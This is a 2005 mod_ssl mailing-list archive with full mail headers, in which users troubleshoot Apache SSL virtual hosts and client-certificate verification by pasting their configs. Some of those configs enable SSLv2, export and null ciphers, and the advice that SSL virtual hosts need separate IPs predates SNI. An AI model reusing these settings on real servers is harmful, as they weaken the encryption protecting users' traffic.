  b=kO5r1gyMDmIAloOJ9tq2306Zw1/pS8AXuuIGFBO/8OW4s3la5CULr0aTKle0/M861HZoVY3ERyXt4FfDJ0Ct8VJw7ZQlz1ELprj4u2Kuskrx+e/Mtfi2wmvZpWST5eiX5aV32THx5s6Cwg3cy6N8zohyUAJ8w9ODmmTErp+4quU=  ;
Message-ID: <20050727134912.52591.qmail@web42405.mail.yahoo.com>
Received: from [62.129.121.32] by web42405.mail.yahoo.com via HTTP; Wed, 27 Jul 2005 06:49:12 PDT
Date: Wed, 27 Jul 2005 06:49:12 -0700 (PDT)
From: Matt Stevenson 
Subject: Re: certificate weirdness
To: modssl-users@modssl.org
In-Reply-To: <20050726163422.GA14812@saltspring.math.uwaterloo.ca>
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Matt Stevenson 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello Vlad,

You are trying to use NameVirtualHost for ssl which
will not work. Basically which cert does it use? The
ssl connection needs to be setup before the site name
(hence virtual host and cert) can be established by
apache.

You'll need two IPs, or use different ports (yuck).

Regards
Matt

--- Vlad Ciubotariu  wrote:

> I'm doing something wrong in my config file.  For
> some reason, when
> pointed to https://calendar.mydomain.ca the browser
> tells me the
> security certificate belongs to mail.mydomain.ca
> even though the two
> domains have been configured with different
> certificates.
> 
> Could anyone shed some light, please? Thanks in
> advance.
> 
> ##
> ##  SSL Support
> ##
> ##  When we also provide SSL we have to listen to
> the 
> ##  standard HTTP port (see above) and to the HTTPS
> port
> ##
> 
> Listen 80
> Listen 443
> 
> 
>
...............................................................................
> 
> NameVirtualHost *:80
> NameVirtualHost *:443
> 
> #
> # VirtualHost example:
> # Almost any Apache directive may go into a
> VirtualHost container.
> 
> 
>     ServerAdmin web@mydomain.org
>     DocumentRoot /var/www/virthosts/mail
>     ServerName mail.mydomain.org
>     Redirect / https://mail.mydomain.org/
> 
> 
> 
>     ServerAdmin web@mydomain.org
>     DocumentRoot /var/www/virthosts/calendar
>     ServerName calendar.mydomain.org
>     Redirect / https://calendar.mydomain.org/
> 
> 
> 
> ##
> ##  SSL Global Context
> ##
> ##  All SSL configuration in this context applies
> both to
> ##  the main server and all SSL-enabled virtual
> hosts.
> ##
> 
> #
> #   Some MIME-types for downloading Certificates and
> CRLs
> #
> 
> AddType application/x-x509-ca-cert .crt
> AddType application/x-pkcs7-crl    .crl
> 
> 
> 
> 
> #   Pass Phrase Dialog:
> #   Configure the pass phrase gathering process.
> #   The filtering dialog program (`builtin' is a
> internal
> #   terminal dialog) has to provide the pass phrase
> on stdout.
> SSLPassPhraseDialog  builtin
> 
> #   Inter-Process Session Cache:
> #   Configure the SSL Session Cache: First either
> `none'
> #   or `dbm:/path/to/file' for the mechanism to use
> and
> #   second the expiring timeout (in seconds).
> SSLSessionCache         dbm:logs/ssl_scache
> SSLSessionCacheTimeout  300
> 
> #   Semaphore:
> #   Configure the path to the mutual exclusion
> semaphore the
> #   SSL engine uses internally for inter-process
> synchronization. 
> SSLMutex  sem
> 
> #   Pseudo Random Number Generator (PRNG):
> #   Configure one or more sources to seed the PRNG
> of the 
> #   SSL library. The seed data should be of good
> random quality.
> SSLRandomSeed startup builtin
> SSLRandomSeed connect builtin
> #SSLRandomSeed startup file:/dev/random  512
> #SSLRandomSeed startup file:/dev/urandom 512
> #SSLRandomSeed connect file:/dev/random  512
> #SSLRandomSeed connect file:/dev/urandom 512
> SSLRandomSeed startup file:/dev/arandom  512
> 
> #   Logging:
> #   The home of the dedicated SSL protocol logfile.
> Errors are
> #   additionally duplicated in the general error log
> file.  Put
> #   this somewhere where it cannot be used for
> symlink attacks on
> #   a real server (i.e. somewhere where only root
> can write).
> #   Log levels are (ascending order: higher ones
> include lower ones):
> #   none, error, warn, info, trace, debug.
> SSLLog      logs/ssl_engine_log
> SSLLogLevel info
> 
> 
> 
> 
> 
> ##
> ## SSL Virtual Host Context
> ##
> 
> 
>     ServerAdmin web@mydomain.org
>     DocumentRoot /var/www/virthosts/mail
>     ServerName mail.mydomain.org
>     SSLEngine on
>     SSLCertificateFile    /etc/ssl/webmail.crt
>     SSLCertificateKeyFile
> /etc/ssl/private/webmail.key
>     
>       SSLRequireSsl
>     
> 
> 
> 
>     ServerAdmin web@mydomain.org
>     DocumentRoot /var/www/virthosts/calendar
>     ServerName calendar.mydomain.org
>     SSLEngine on
>     SSLCertificateFile    /etc/ssl/calendar.crt
>     SSLCertificateKeyFile
> /etc/ssl/private/calendar.key
>     
>       SSLRequireSsl
>     
>     
>         Order allow,deny
> 	Allow from all
>     
>     
>         SetHandler perl-script
>         PerlHandler Apache::Registry
>         #PerlHandler Apache::PerlRun
>         Options ExecCGI
>         PerlSendHeader On
>     
> 
> #
> 
> #  General setup for the virtual host
> #DocumentRoot /var/www/htdocs
> #ServerName new.host.name
> #ServerAdmin you@your.address
> #ErrorLog logs/error_log
> #TransferLog logs/access_log
> 
> #   SSL Engine Switch:
> #   Enable/Disable SSL for this virtual host.
> SSLEngine on
> 
> #   SSL Cipher Suite:
> #   List the ciphers that the client is permitted to
> negotiate.
> #   See the mod_ssl documentation for a complete
> list.
> #SSLCipherSuite
> ALL:!ADH:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP
> 
> #   Server Certificate:
> #   Point SSLCertificateFile at a PEM encoded
> certificate.  If
> #   the certificate is encrypted, then you will be
> prompted for a
> #   pass phrase.  Note that a kill -HUP will prompt
> again. A test
> #   certificate can be generated with `make
> certificate' under
> #   built time.
> SSLCertificateFile    /etc/ssl/server.crt
> 
> #   Server Private Key:
> #   If the key is not combined with the certificate,
> use 
=== message truncated ===



		
____________________________________________________
Start your day with Yahoo! - make it your home page 
http://www.yahoo.com/r/hs 
 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jul 27 18:08:22 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 9C9C314D9A1; Wed, 27 Jul 2005 18:08:22 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from saltspring.math.uwaterloo.ca (saltspring.cs.uwaterloo.ca [129.97.79.37])
	by master.modssl.org (Postfix) with ESMTP id EAD8614D98F
	for ; Wed, 27 Jul 2005 18:08:21 +0200 (CEST)
Received: from saltspring.math.uwaterloo.ca (vlad@localhost.math.uwaterloo.ca [127.0.0.1])
	by saltspring.math.uwaterloo.ca (8.13.3/8.13.3) with ESMTP id j6RG8F5Y007542
	for ; Wed, 27 Jul 2005 12:08:15 -0400 (EDT)
Received: (from vlad@localhost)
	by saltspring.math.uwaterloo.ca (8.13.3/8.13.0/Submit) id j6RG8EUs003735
	for modssl-users@modssl.org; Wed, 27 Jul 2005 12:08:14 -0400 (EDT)
Date: Wed, 27 Jul 2005 12:08:14 -0400
From: Vlad Ciubotariu 
To: modssl-users@modssl.org
Subject: Re: certificate weirdness
Message-ID: <20050727160814.GA6642@saltspring.math.uwaterloo.ca>
References: <20050726163422.GA14812@saltspring.math.uwaterloo.ca> <20050727134912.52591.qmail@web42405.mail.yahoo.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <20050727134912.52591.qmail@web42405.mail.yahoo.com>
User-Agent: Mutt/1.4.2i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Vlad Ciubotariu 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I've finally got it to work.  I possibly see why it didn't work from the first
place.

Mod_ssl handles encryption before httpd even sees the url. Thus I can't set
certifaces in  or name-based  containers.

Thanks!



On Wed, Jul 27, 2005 at 06:49:12AM -0700, Matt Stevenson wrote:
> Hello Vlad,
> 
> You are trying to use NameVirtualHost for ssl which
> will not work. Basically which cert does it use? The
> ssl connection needs to be setup before the site name
> (hence virtual host and cert) can be established by
> apache.
> 
> You'll need two IPs, or use different ports (yuck).
> 
> Regards
> Matt
> 
> --- Vlad Ciubotariu  wrote:
> 
> > I'm doing something wrong in my config file.  For
> > some reason, when
> > pointed to https://calendar.mydomain.ca the browser
> > tells me the
> > security certificate belongs to mail.mydomain.ca
> > even though the two
> > domains have been configured with different
> > certificates.
> > 
> > Could anyone shed some light, please? Thanks in
> > advance.
> > 
> > ##
> > ##  SSL Support
> > ##
> > ##  When we also provide SSL we have to listen to
> > the 
> > ##  standard HTTP port (see above) and to the HTTPS
> > port
> > ##
> > 
> > Listen 80
> > Listen 443
> > 
> > 
> >
> ...............................................................................
> > 
> > NameVirtualHost *:80
> > NameVirtualHost *:443
> > 
> > #
> > # VirtualHost example:
> > # Almost any Apache directive may go into a
> > VirtualHost container.
> > 
> > 
> >     ServerAdmin web@mydomain.org
> >     DocumentRoot /var/www/virthosts/mail
> >     ServerName mail.mydomain.org
> >     Redirect / https://mail.mydomain.org/
> > 
> > 
> > 
> >     ServerAdmin web@mydomain.org
> >     DocumentRoot /var/www/virthosts/calendar
> >     ServerName calendar.mydomain.org
> >     Redirect / https://calendar.mydomain.org/
> > 
> > 
> > 
> > ##
> > ##  SSL Global Context
> > ##
> > ##  All SSL configuration in this context applies
> > both to
> > ##  the main server and all SSL-enabled virtual
> > hosts.
> > ##
> > 
> > #
> > #   Some MIME-types for downloading Certificates and
> > CRLs
> > #
> > 
> > AddType application/x-x509-ca-cert .crt
> > AddType application/x-pkcs7-crl    .crl
> > 
> > 
> > 
> > 
> > #   Pass Phrase Dialog:
> > #   Configure the pass phrase gathering process.
> > #   The filtering dialog program (`builtin' is a
> > internal
> > #   terminal dialog) has to provide the pass phrase
> > on stdout.
> > SSLPassPhraseDialog  builtin
> > 
> > #   Inter-Process Session Cache:
> > #   Configure the SSL Session Cache: First either
> > `none'
> > #   or `dbm:/path/to/file' for the mechanism to use
> > and
> > #   second the expiring timeout (in seconds).
> > SSLSessionCache         dbm:logs/ssl_scache
> > SSLSessionCacheTimeout  300
> > 
> > #   Semaphore:
> > #   Configure the path to the mutual exclusion
> > semaphore the
> > #   SSL engine uses internally for inter-process
> > synchronization. 
> > SSLMutex  sem
> > 
> > #   Pseudo Random Number Generator (PRNG):
> > #   Configure one or more sources to seed the PRNG
> > of the 
> > #   SSL library. The seed data should be of good
> > random quality.
> > SSLRandomSeed startup builtin
> > SSLRandomSeed connect builtin
> > #SSLRandomSeed startup file:/dev/random  512
> > #SSLRandomSeed startup file:/dev/urandom 512
> > #SSLRandomSeed connect file:/dev/random  512
> > #SSLRandomSeed connect file:/dev/urandom 512
> > SSLRandomSeed startup file:/dev/arandom  512
> > 
> > #   Logging:
> > #   The home of the dedicated SSL protocol logfile.
> > Errors are
> > #   additionally duplicated in the general error log
> > file.  Put
> > #   this somewhere where it cannot be used for
> > symlink attacks on
> > #   a real server (i.e. somewhere where only root
> > can write).
> > #   Log levels are (ascending order: higher ones
> > include lower ones):
> > #   none, error, warn, info, trace, debug.
> > SSLLog      logs/ssl_engine_log
> > SSLLogLevel info
> > 
> > 
> > 
> > 
> > 
> > ##
> > ## SSL Virtual Host Context
> > ##
> > 
> > 
> >     ServerAdmin web@mydomain.org
> >     DocumentRoot /var/www/virthosts/mail
> >     ServerName mail.mydomain.org
> >     SSLEngine on
> >     SSLCertificateFile    /etc/ssl/webmail.crt
> >     SSLCertificateKeyFile
> > /etc/ssl/private/webmail.key
> >     
> >       SSLRequireSsl
> >     
> > 
> > 
> > 
> >     ServerAdmin web@mydomain.org
> >     DocumentRoot /var/www/virthosts/calendar
> >     ServerName calendar.mydomain.org
> >     SSLEngine on
> >     SSLCertificateFile    /etc/ssl/calendar.crt
> >     SSLCertificateKeyFile
> > /etc/ssl/private/calendar.key
> >     
> >       SSLRequireSsl
> >     
> >     
> >         Order allow,deny
> > 	Allow from all
> >     
> >     
> >         SetHandler perl-script
> >         PerlHandler Apache::Registry
> >         #PerlHandler Apache::PerlRun
> >         Options ExecCGI
> >         PerlSendHeader On
> >     
> > 
> > #
> > 
> > #  General setup for the virtual host
> > #DocumentRoot /var/www/htdocs
> > #ServerName new.host.name
> > #ServerAdmin you@your.address
> > #ErrorLog logs/error_log
> > #TransferLog logs/access_log
> > 
> > #   SSL Engine Switch:
> > #   Enable/Disable SSL for this virtual host.
> > SSLEngine on
> > 
> > #   SSL Cipher Suite:
> > #   List the ciphers that the client is permitted to
> > negotiate.
> > #   See the mod_ssl documentation for a complete
> > list.
> > #SSLCipherSuite
> > ALL:!ADH:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP
> > 
> > #   Server Certificate:
> > #   Point SSLCertificateFile at a PEM encoded
> > certificate.  If
> > #   the certificate is encrypted, then you will be
> > prompted for a
> > #   pass phrase.  Note that a kill -HUP will prompt
> > again. A test
> > #   certificate can be generated with `make
> > certificate' under
> > #   built time.
> > SSLCertificateFile    /etc/ssl/server.crt
> > 
> > #   Server Private Key:
> > #   If the key is not combined with the certificate,
> > use 
> === message truncated ===
> 
> 
> 
> 		
> ____________________________________________________
> Start your day with Yahoo! - make it your home page 
> http://www.yahoo.com/r/hs 
>  
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jul 28 00:01:17 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id B909D14D9B5; Thu, 28 Jul 2005 00:01:17 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from darkstar.sysinfo.com (darkstar.sysinfo.com [70.61.80.18])
	by master.modssl.org (Postfix) with ESMTP id 52E1814D9A8
	for ; Thu, 28 Jul 2005 00:01:16 +0200 (CEST)
Received: from blackhole.sysinfo.com (blackhole.sysinfo.com [70.61.80.19])
	by darkstar.sysinfo.com (8.12.11/8.12.11) with ESMTP id j6RM81U7022158;
	Wed, 27 Jul 2005 18:08:16 -0400
Date: Wed, 27 Jul 2005 18:07:58 -0400 (EDT)
From: "R. DuFresne" 
To: Pj 
Cc: modssl-users@modssl.org
Subject: RE: HTTPS Without OpenSSL Native
In-Reply-To: <20050726021645.5686.qmail@house.arach.net.au>
Message-ID: 
References: <20050726021645.5686.qmail@house.arach.net.au>
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: MULTIPART/MIXED; BOUNDARY="1028002384-1828566319-1122502078=:22087"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

  This message is in MIME format.  The first part should be readable text,
  while the remaining parts are likely unreadable without MIME-aware tools.

--1028002384-1828566319-1122502078=:22087
Content-Type: TEXT/PLAIN; charset=iso-8859-1; format=flowed
Content-Transfer-Encoding: 8BIT

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On Tue, 26 Jul 2005, Pj wrote:

> Download the apache source and study mod_ssl its pretty clean...
>


The ugly end is when he needs to DL and study the openssl code which is 
likely to be far less clean and much more hefty.

thanks,

Ron DuFresne

>
> -----Original Message-----
> From: owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org]
> On Behalf Of Delfim Machado
> Sent: Tuesday, 26 July 2005 4:18 AM
> To: modssl-users@modssl.org
> Subject: Re: HTTPS Without OpenSSL Native
>
> stunnel?
>
>
> On Jul 25, 2005, at 21:12, Leonardo Cavallari Militelli wrote:
>
>
>
> Hi all,
>  
> I'm looking for another way to implement ssl on an apache web server than
> using mod_ssl or apache-ssl.
> Is there a way to implement ssl directly with Openssl?
>  
> I'm developing an intrusion detection and prevention system for my msc
> thesis. I already use the sample web server that comes with openssl, but now
> I need to know which are the relation between mod_ssl and the openssl?
>  
> tks anyway!
>  
> Leo
>
>
>
> --
> Delfim Machado
>
> ~ "Serei sempre o que nunca irei ser! Sempre serei o que nunca vais ver!" -
> Eu mesmo
>
>
> --
> No virus found in this incoming message.
> Checked by AVG Anti-Virus.
> Version: 7.0.338 / Virus Database: 267.9.4/57 - Release Date: 22/07/2005
>
>
>
> --
> No virus found in this outgoing message.
> Checked by AVG Anti-Virus.
> Version: 7.0.338 / Virus Database: 267.9.5/58 - Release Date: 25/07/2005
>
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>

- -- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
         admin & senior security consultant:  sysinfo.com
                         http://sysinfo.com
Key fingerprint = 9401 4B13 B918 164C 647A  E838 B2DF AFCC 94B0 6629

...We waste time looking for the perfect lover
instead of creating the perfect love.

                 -Tom Robbins 
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFC6AXBst+vzJSwZikRAhpGAJ93muvCmR2w70iJIl2j9VA2CyUlegCdEz2a
oIsZ5luuj/lnaIGrThM/iE0=
=hPwk
-----END PGP SIGNATURE-----
--1028002384-1828566319-1122502078=:22087--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jul 29 14:49:38 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 880D014D9AD; Fri, 29 Jul 2005 14:49:38 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from c1-2-6.rz.ruhr-uni-bochum.de (c1-2-6.rz.ruhr-uni-bochum.de [134.147.32.86])
	by master.modssl.org (Postfix) with SMTP id 4883814D977
	for ; Fri, 29 Jul 2005 14:49:37 +0200 (CEST)
Received: (qmail 29919 invoked by uid 281); 29 Jul 2005 12:49:35 -0000
Received: from 134.147.64.14 by c1-2-6.rz.ruhr-uni-bochum.de (envelope-from , uid 80) with qmail-scanner-1.25 
 (sophie: 3.04/2.30/3.94.  
 Clear:RC:1(134.147.64.14):. 
 Processed in 0.032774 secs); 29 Jul 2005 12:49:35 -0000
Received: from sunu007.rz.ruhr-uni-bochum.de (134.147.64.14)
  by c1-2-6.rz.ruhr-uni-bochum.de with SMTP; 29 Jul 2005 12:49:35 -0000
Received: (qmail 7550 invoked from network); 29 Jul 2005 12:49:34 -0000
Received: from i5387d186.versanet.de (HELO mainframe) (loescsbx@83.135.209.134)
  by mail.ruhr-uni-bochum.de with SMTP; 29 Jul 2005 12:49:34 -0000
From: =?iso-8859-1?Q?Sven_L=F6schner?= 
To: 
Subject: SSLVerifyClient fails
Date: Fri, 29 Jul 2005 14:50:16 +0200
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Mailer: Microsoft Office Outlook, Build 11.0.6353
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2527
Thread-Index: AcWUPBGkaPS2FCIpT6iKM6YRPIq7iQ==
X-Qmail-Scanner-Message-ID: <112264137570129912@c1-2-6.rz.ruhr-uni-bochum.de>
Message-Id: <20050729124937.4883814D977@master.modssl.org>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: =?iso-8859-1?Q?Sven_L=F6schner?= 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I got a big problem with SSLVerifyClient. I had a similar problem before,
but now the error(s?) is really more strange (in my point of view). I used
this tutorial: http://fra.nksteidl.de/Erinnerungen/OpenSSL.php

I hae got two sections. One with only server-side-SSL (works), and a folder
(called 'demo', with a file 'index.php') with client-side-SSL. When I call
the site my browser askes me to choose a cert i want to uns to enter the
site. I choose the right one (exportedvia pkcs), and then IE says "cannot
find server or dns ", and firebird doesn't do anything (it stays on my
startpage, but with the "lock"-symbol in Task).



So I have got a Root_CA, a Server_CA and a User_CA.

The Root_CA verifys the other 2 CAs. Server_CA verifys Server-Certificates
(no problem). User_CA verifys Client-Certificates.

I concated the Certificates from Root and User_CA "cat ..../RootCA.cert.pem
..../UserCA.cert.pem > UserCAchaincert.pem"

My integration in apache:

NameVirtualHost xxx.xxx.xxx.xxx:443

   ServerName test.de
   DocumentRoot /srv/www/htdocs/web3/html/test
        php_admin_value open_basedir /srv/www/htdocs/web3/html/test
  
    SSLEngine on
    SSLCipherSuite
ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
    SSLProtocol all

    AddType application/x-x509-ca-cert .crt
    AddType application/x-pkcs7-crl    .crl

    SSLOptions +StdEnvVars +ExportCertData
    ErrorLog "/var/log/apache2/test/ssl.log"
    LogLevel debug
     SSLVerifyClient none
     SSLCertificateFile /etc/ssl/ServerCA/testcert.pem
     SSLCertificateKeyFile /etc/ssl/ServerCA/testkey.pem
     SSLCACertificateFile /etc/ssl/UserCA/UserCAchaincert.pem
    SetEnvIf User-Agent ".*MSIE.*" nokeepalive ssl-unclean-shutdown

 
   
     SSLRequireSSL
      SSLVerifyClient require
      SSLVerifyDepth 1
                              

If you need something more, just let me know. And thank you very much in
advance for every helping idea, because i try to get this to work since
weeks.

Sven

P.S: I use Suse Linux 9.0 with mod_ssl and openssl 0.9.7b (would like to
update....)

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jul 29 16:59:48 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 5E20E14D9BE; Fri, 29 Jul 2005 16:59:48 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web42403.mail.yahoo.com (web42403.mail.yahoo.com [66.218.93.226])
	by master.modssl.org (Postfix) with SMTP id B29D714D991
	for ; Fri, 29 Jul 2005 16:59:46 +0200 (CEST)
Received: (qmail 32689 invoked by uid 60001); 29 Jul 2005 14:59:45 -0000
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
  s=s1024; d=yahoo.com;
  h=Message-ID:Received:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type:Content-Transfer-Encoding;
  b=EO4TEfY31hHdglh3Ep3NXvqb673DO6AaJa62s72vXpvz1P7wN24CPRTt3wrXhooWWOXwrh7DnfUfJ8lFdJADGjSsUP1yxC9sGHhlppuf1vxlfVZZcGut/0kKiyCalJgH/PyVq2U0BXzXLNa+MJnCCfaCtzChCpFHyCQ2QJJbNrQ=  ;
Message-ID: <20050729145945.32687.qmail@web42403.mail.yahoo.com>
Received: from [62.129.121.32] by web42403.mail.yahoo.com via HTTP; Fri, 29 Jul 2005 07:59:45 PDT
Date: Fri, 29 Jul 2005 07:59:45 -0700 (PDT)
From: Matt Stevenson 
Subject: Re: SSLVerifyClient fails
To: modssl-users@modssl.org
In-Reply-To: <20050729124937.4883814D977@master.modssl.org>
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Matt Stevenson 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,

You have a intermediate and RootCA, try setting
SSLVerifyDepth equal to 2.

Regards
Matt

--- Sven Löschner  wrote:

> I got a big problem with SSLVerifyClient. I had a
> similar problem before,
> but now the error(s?) is really more strange (in my
> point of view). I used
> this tutorial:
> http://fra.nksteidl.de/Erinnerungen/OpenSSL.php
> 
> I hae got two sections. One with only
> server-side-SSL (works), and a folder
> (called 'demo', with a file 'index.php') with
> client-side-SSL. When I call
> the site my browser askes me to choose a cert i want
> to uns to enter the
> site. I choose the right one (exportedvia pkcs), and
> then IE says "cannot
> find server or dns ", and firebird doesn't do
> anything (it stays on my
> startpage, but with the "lock"-symbol in Task).
> 
> 
> 
> So I have got a Root_CA, a Server_CA and a User_CA.
> 
> The Root_CA verifys the other 2 CAs. Server_CA
> verifys Server-Certificates
> (no problem). User_CA verifys Client-Certificates.
> 
> I concated the Certificates from Root and User_CA
> "cat ..../RootCA.cert.pem
> ..../UserCA.cert.pem > UserCAchaincert.pem"
> 
> My integration in apache:
> 
> NameVirtualHost xxx.xxx.xxx.xxx:443
> 
>    ServerName test.de
>    DocumentRoot /srv/www/htdocs/web3/html/test
>         php_admin_value open_basedir
> /srv/www/htdocs/web3/html/test
>   
>     SSLEngine on
>     SSLCipherSuite
>
ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
>     SSLProtocol all
> 
>     AddType application/x-x509-ca-cert .crt
>     AddType application/x-pkcs7-crl    .crl
> 
>     SSLOptions +StdEnvVars +ExportCertData
>     ErrorLog "/var/log/apache2/test/ssl.log"
>     LogLevel debug
>      SSLVerifyClient none
>      SSLCertificateFile
> /etc/ssl/ServerCA/testcert.pem
>      SSLCertificateKeyFile
> /etc/ssl/ServerCA/testkey.pem
>      SSLCACertificateFile
> /etc/ssl/UserCA/UserCAchaincert.pem
>     SetEnvIf User-Agent ".*MSIE.*" nokeepalive
> ssl-unclean-shutdown
> 
>  
>    
>      SSLRequireSSL
>       SSLVerifyClient require
>       SSLVerifyDepth 1
>                               
> 
> If you need something more, just let me know. And
> thank you very much in
> advance for every helping idea, because i try to get
> this to work since
> weeks.
> 
> Sven
> 
> P.S: I use Suse Linux 9.0 with mod_ssl and openssl
> 0.9.7b (would like to
> update....)
> 
>
______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)               
>    www.modssl.org
> User Support Mailing List                     
> modssl-users@modssl.org
> Automated List Manager                           
> majordomo@modssl.org
> 



		
____________________________________________________
Start your day with Yahoo! - make it your home page 
http://www.yahoo.com/r/hs 
 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jul 29 17:13:58 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id D1A4B14D9A9; Fri, 29 Jul 2005 17:13:57 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from c1-2-6.rz.ruhr-uni-bochum.de (c1-2-6.rz.ruhr-uni-bochum.de [134.147.32.86])
	by master.modssl.org (Postfix) with SMTP id 6539314D977
	for ; Fri, 29 Jul 2005 17:13:57 +0200 (CEST)
Received: (qmail 18817 invoked by uid 281); 29 Jul 2005 15:13:56 -0000
Received: from 134.147.64.14 by c1-2-6.rz.ruhr-uni-bochum.de (envelope-from , uid 80) with qmail-scanner-1.25 
 (sophie: 3.04/2.30/3.94.  
 Clear:RC:1(134.147.64.14):. 
 Processed in 0.031664 secs); 29 Jul 2005 15:13:56 -0000
Received: from sunu007.rz.ruhr-uni-bochum.de (134.147.64.14)
  by c1-2-6.rz.ruhr-uni-bochum.de with SMTP; 29 Jul 2005 15:13:56 -0000
Received: (qmail 25752 invoked from network); 29 Jul 2005 15:13:56 -0000
Received: from i5387d186.versanet.de (HELO mainframe) (loescsbx@83.135.209.134)
  by mail.ruhr-uni-bochum.de with SMTP; 29 Jul 2005 15:13:56 -0000
From: =?iso-8859-1?Q?Sven_L=F6schner?= 
To: 
Subject: RE: SSLVerifyClient fails
Date: Fri, 29 Jul 2005 17:14:37 +0200
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Mailer: Microsoft Office Outlook, Build 11.0.6353
In-Reply-To: <20050729145945.32687.qmail@web42403.mail.yahoo.com>
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2527
Thread-Index: AcWUTjxNY6RBO00xRA6KMe0jFyo6lQAAWzHw
X-Qmail-Scanner-Message-ID: <112265003670118809@c1-2-6.rz.ruhr-uni-bochum.de>
Message-Id: <20050729151357.6539314D977@master.modssl.org>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: =?iso-8859-1?Q?Sven_L=F6schner?= 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

> SSLVerifyDepth equal to 2.

Thx, i tried Depth from 1 to 10....but no effect. I think my certificates
are wrong....Especially the concated one. Is there a way to proof these
certificates?

Sven  

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jul 29 17:18:15 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
